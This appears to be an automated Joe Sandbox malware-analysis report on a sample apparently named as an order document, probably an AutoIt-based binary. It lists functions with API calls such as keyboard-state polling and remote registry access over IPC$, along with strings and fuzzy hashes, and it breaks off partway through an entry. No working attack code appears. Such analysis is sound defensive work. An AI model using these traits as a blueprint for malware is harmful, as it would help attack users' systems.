Instruction Fuzzy Hash: 53514971900309EFCB14DFA8C889EAEBBB9EF48310F14882EF959A7251D735AC45CB54

Function 0044CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0044CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0044CCC5
__swprintf.LIBCMT ref: 0044CD1E
__swprintf.LIBCMT ref: 0044CD37
_wprintf.LIBCMT ref: 0044CDED
_wprintf.LIBCMT ref: 0044CE0B

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 0044CDE8
^ ERROR, xrefs: 0044CD8F
Line %d (File "%s"):, xrefs: 0044CD18, 0044CD31
"%s" (%d) : ==> %s:, xrefs: 0044CE06
Error: , xrefs: 0044CDB5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 4d9886d0d9d3ee8179616bb723fcc3339f0dc902fe478c7a0fd9eeeb4d1c7307
Instruction ID: b87f9b5062a23003fa6b05271adbf52b62758fb0d399078fd318079a70c5a6e2
Opcode Fuzzy Hash: 4d9886d0d9d3ee8179616bb723fcc3339f0dc902fe478c7a0fd9eeeb4d1c7307
Instruction Fuzzy Hash: 2B518471900109BADB14EBA1DD82EEEB778AF04304F50017BF505721A2EB386E55DFA8

Function 0044CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0044CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0044CAB0
__swprintf.LIBCMT ref: 0044CB09
__swprintf.LIBCMT ref: 0044CB22
_wprintf.LIBCMT ref: 0044CBCD
_wprintf.LIBCMT ref: 0044CBEB

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 0044CBC8
Line %d (File "%s"):, xrefs: 0044CB03, 0044CB1C
"%s" (%d) : ==> %s:, xrefs: 0044CBE6
^ ERROR , xrefs: 0044CB64
Error: , xrefs: 0044CB95

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: c48871d0ca1cddcdc6c0a3a223cc982310d100a7272aa04c53813a8c9e32628c
Instruction ID: 0117c1f52f1ff57d1bcb18ef8004b0eea4860d9531de2a50c9a6b6b6bbec22b3
Opcode Fuzzy Hash: c48871d0ca1cddcdc6c0a3a223cc982310d100a7272aa04c53813a8c9e32628c
Instruction Fuzzy Hash: 1D51C371900119AADB14EBE2DD82EEEB778EF04344F50017BB405720A2DB786F59DFA9

Function 00463C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

Strings

HKEY_CURRENT_USER, xrefs: 00463CE2
HKCU, xrefs: 00463CF3
HKEY_LOCAL_MACHINE, xrefs: 00463C6C
HKEY_CURRENT_CONFIG, xrefs: 00463CC0
HKCR, xrefs: 00463CAB
HKLM, xrefs: 00463C81
HKEY_CLASSES_ROOT, xrefs: 00463C96
$EK, xrefs: 00463C36
HKCC, xrefs: 00463CD1
HKEY_USERS, xrefs: 00463D04
HKU, xrefs: 00463D15

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BuffCharUpper
String ID: $EK$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-1980552132
Opcode ID: 8276aaae087ce779344c5fc208d36587247653eb93cfce2328360621810407f9
Instruction ID: ad30a63cd24f7d54607a59822f4ecf4770b9bc0142d55a31a3a5dd16e4feea72
Opcode Fuzzy Hash: 8276aaae087ce779344c5fc208d36587247653eb93cfce2328360621810407f9
Instruction Fuzzy Hash: 0741213410028A9BDF10EF11D851AEB3365AF52345F10441BEC551B293FB78AE4ACB69

Function 004455BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004455D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00445664
GetMenuItemCount.USER32(004C1708), ref: 004456ED
DeleteMenu.USER32(004C1708,00000005,00000000,000000F5,?,?), ref: 0044577D
DeleteMenu.USER32(004C1708,00000004,00000000), ref: 00445785
DeleteMenu.USER32(004C1708,00000006,00000000), ref: 0044578D
DeleteMenu.USER32(004C1708,00000003,00000000), ref: 00445795
GetMenuItemCount.USER32(004C1708), ref: 0044579D
SetMenuItemInfoW.USER32(004C1708,00000004,00000000,00000030), ref: 004457D3
GetCursorPos.USER32(?), ref: 004457DD
SetForegroundWindow.USER32(00000000), ref: 004457E6
TrackPopupMenuEx.USER32(004C1708,00000000,?,00000000,00000000,00000000), ref: 004457F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00445805

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: fe47924269ecb829c8cb5bb70370f5f918f2a5a71e0279e36aa44755a4212213
Instruction ID: 8c316e5e6c6797ab3a2176d1e40451a3ac209fe88f8ea6b3beab8faaca75f620
Opcode Fuzzy Hash: fe47924269ecb829c8cb5bb70370f5f918f2a5a71e0279e36aa44755a4212213
Instruction Fuzzy Hash: EB71E230641A15BBFF209B15DC49FAABF65FF40368F24021BF618AA2D2C7795C10DB99

Function 0043A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0043A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0043A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0043A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0043A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0043A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0043A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0043A2AB

Strings

\CLSID, xrefs: 0043A193
SOFTWARE\Classes\, xrefs: 0043A17D
\IPC$, xrefs: 0043A1F3

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 8e89b60b28c57dbbb31bac0aaff507f3a2d39c807fdeec03431fd816579aeec0
Instruction ID: 36ac115add83da1bd3147b99ffcafd1a036894dfbf49d0a91a3d47e0976b8548
Opcode Fuzzy Hash: 8e89b60b28c57dbbb31bac0aaff507f3a2d39c807fdeec03431fd816579aeec0
Instruction Fuzzy Hash: 70411A71C10229AACF15EBA5DC85DEEB778FF08314F00456AF801B72A0DB789D15CBA4

Function 004467E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004467FD
__swprintf.LIBCMT ref: 0044680A

Part of subcall function 0042172B: __woutput_l.LIBCMT ref: 00421784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00446834
LoadResource.KERNEL32(?,00000000), ref: 00446840
LockResource.KERNEL32(00000000), ref: 0044684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0044686D
LoadResource.KERNEL32(?,00000000), ref: 0044687F
SizeofResource.KERNEL32(?,00000000), ref: 0044688E
LockResource.KERNEL32(?), ref: 0044689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004468F9

Strings

5K, xrefs: 004467F6

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5K
API String ID: 1433390588-2802765362
Opcode ID: 6872b4b3d6b3d34319df9a50e78a3afd508431f81b654905c2b9f4d6c5d1579e
Instruction ID: d697a1fa8781da38c78068c46b0b6ff43c18bd23b22d0c88ecb10fbe5a78bbdf
Opcode Fuzzy Hash: 6872b4b3d6b3d34319df9a50e78a3afd508431f81b654905c2b9f4d6c5d1579e
Instruction Fuzzy Hash: 3731CA7190221AAFEB10AF61DD55EBFBBA8FF09340F018826F901D2151D738D911D779

Function 004425B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004736F4,00000010,?,Bad directive syntax error,0049DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004425D6
LoadStringW.USER32(00000000,?,004736F4,00000010), ref: 004425DD
_wprintf.LIBCMT ref: 00442610
__swprintf.LIBCMT ref: 00442632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004426A1

Strings

Error: , xrefs: 0044266F
., xrefs: 00442687
Line %d (File "%s"):, xrefs: 00442647
%s (%d) : ==> %s.: %s %s, xrefs: 0044260B
Line %d:, xrefs: 0044262C

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: bddce8d6d50807ee37d21da54e30933fa5fddeb0f0bdf3a656de57c6af04d4ae
Instruction ID: 6e45d18c7c245d819c2143957a2fa29815b484cd66ec6b662217039c2da16d9e
Opcode Fuzzy Hash: bddce8d6d50807ee37d21da54e30933fa5fddeb0f0bdf3a656de57c6af04d4ae
Instruction Fuzzy Hash: 6F215E3190021ABBCF11AF91DC4AFEE7735BF18308F40046AF505760A2EA79AA15DB68

Function 00447AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00447B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00447B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00447B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00447B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00447B8C

Strings

open , xrefs: 00447AF1
status PlayMe mode, xrefs: 00447B3D
alias PlayMe, xrefs: 00447B1B
play PlayMe, xrefs: 00447B87
play PlayMe wait, xrefs: 00447B76
close PlayMe, xrefs: 00447B53, 00447B80

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: f4254b867bbb18d943fa684cdb411ab766b7861bf0ef52c92d368e590af44ed1
Instruction ID: c629913f0061c8dedb4f08ab5be99ac441f65e11a239b6320b0dcc44f92cb62d
Opcode Fuzzy Hash: f4254b867bbb18d943fa684cdb411ab766b7861bf0ef52c92d368e590af44ed1
Instruction Fuzzy Hash: 3F1196A094015979E720B763CC45EFF7A7CDB91B14F10052B7411770C1DE782A45C5B8

Function 0044778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00447794

Part of subcall function 0041DC38: timeGetTime.WINMM(?,75C0B400,004758AB), ref: 0041DC3C

Sleep.KERNEL32(0000000A), ref: 004477C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004477E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00447806
SetActiveWindow.USER32 ref: 00447825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00447833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00447852
Sleep.KERNEL32(000000FA), ref: 0044785D
IsWindow.USER32 ref: 00447869
EndDialog.USER32(00000000), ref: 0044787A

Strings

BUTTON, xrefs: 004477F8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: fc4ab62694c49ec1099aeb68e51c4f0e646b245e142f7d642acf0be79513975a
Instruction ID: 3f3377c3b03e6d66edf864826632aa4226d8703482a69eaeed50c8e58cd4201f
Opcode Fuzzy Hash: fc4ab62694c49ec1099aeb68e51c4f0e646b245e142f7d642acf0be79513975a
Instruction Fuzzy Hash: CF215370605645AFF7016F20EC89F6A3F29FB44349B00483AF905812B2DB6D5C06DB6D

Function 004502EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CoInitialize.OLE32(00000000), ref: 0045034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004503DE
SHGetDesktopFolder.SHELL32(?), ref: 004503F2
CoCreateInstance.OLE32(0048DA8C,00000000,00000001,004B3CF8,?), ref: 0045043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004504AD
CoTaskMemFree.OLE32(?,?), ref: 00450505
_memset.LIBCMT ref: 00450542
SHBrowseForFolderW.SHELL32(?), ref: 0045057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004505A1
CoTaskMemFree.OLE32(00000000), ref: 004505A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004505DF
CoUninitialize.OLE32(00000001,00000000), ref: 004505E1

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 062dc47b6f4fbc4db1a79a3821b1d39e3306bf4e01258e0b3f47f8665743b785
Instruction ID: 3586f6fd98b86659115b9bfb8829d1e59e8e8623d16e807983909ebb0081da27
Opcode Fuzzy Hash: 062dc47b6f4fbc4db1a79a3821b1d39e3306bf4e01258e0b3f47f8665743b785
Instruction Fuzzy Hash: 0DB1FA75A00109AFDB04DFA5C888DAEBBB9FF48305B1484AAF905EB251DB34ED45CF54

Function 00442E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00442ED6
SetKeyboardState.USER32(?), ref: 00442F41
GetAsyncKeyState.USER32(000000A0), ref: 00442F61
GetKeyState.USER32(000000A0), ref: 00442F78
GetAsyncKeyState.USER32(000000A1), ref: 00442FA7
GetKeyState.USER32(000000A1), ref: 00442FB8
GetAsyncKeyState.USER32(00000011), ref: 00442FE4
GetKeyState.USER32(00000011), ref: 00442FF2
GetAsyncKeyState.USER32(00000012), ref: 0044301B
GetKeyState.USER32(00000012), ref: 00443029
GetAsyncKeyState.USER32(0000005B), ref: 00443052
GetKeyState.USER32(0000005B), ref: 00443060

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 83d05710d7bc35541dbc9f2eed5bfe7989f5dcf0168877b9afbe318fe6ee6b74
Instruction ID: 9c45705a8db000e6a4ee7a8628f9c376aea548831c4a3dd55c4c2afd4bab552e
Opcode Fuzzy Hash: 83d05710d7bc35541dbc9f2eed5bfe7989f5dcf0168877b9afbe318fe6ee6b74
Instruction Fuzzy Hash: 39512860A0478429FB35DFA089007EBBFF45F11744F88459FD5C2562C2DA9CAB8CC76A

Function 0043ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0043ED1E
GetWindowRect.USER32(00000000,?), ref: 0043ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0043ED8E
GetDlgItem.USER32(?,00000002), ref: 0043ED99
GetWindowRect.USER32(00000000,?), ref: 0043EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0043EE01
GetDlgItem.USER32(?,000003E9), ref: 0043EE0F
GetWindowRect.USER32(00000000,?), ref: 0043EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0043EE63
GetDlgItem.USER32(?,000003EA), ref: 0043EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0043EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0043EE9B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: b465c413cca5253bdedd3256ff6a12ecff45f755c229ed3141aa91a502673eff
Instruction ID: 00737507538eb1ccc85ebbe3006c59c153ea565c734b707143fa93c06e9301c0
Opcode Fuzzy Hash: b465c413cca5253bdedd3256ff6a12ecff45f755c229ed3141aa91a502673eff
Instruction Fuzzy Hash: 7D512171B01209AFDB18DF69CD85AAEBBBAEB88310F14852DF519E72D0E7749D008B14

Function 0041B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0041B759,?,00000000,?,?,?,?,0041B72B,00000000,?), ref: 0041BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0041B72B), ref: 0041B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0041B88D
DestroyAcceleratorTable.USER32(00000000), ref: 0047D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D90A
DeleteObject.GDI32(00000000), ref: 0047D91C

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
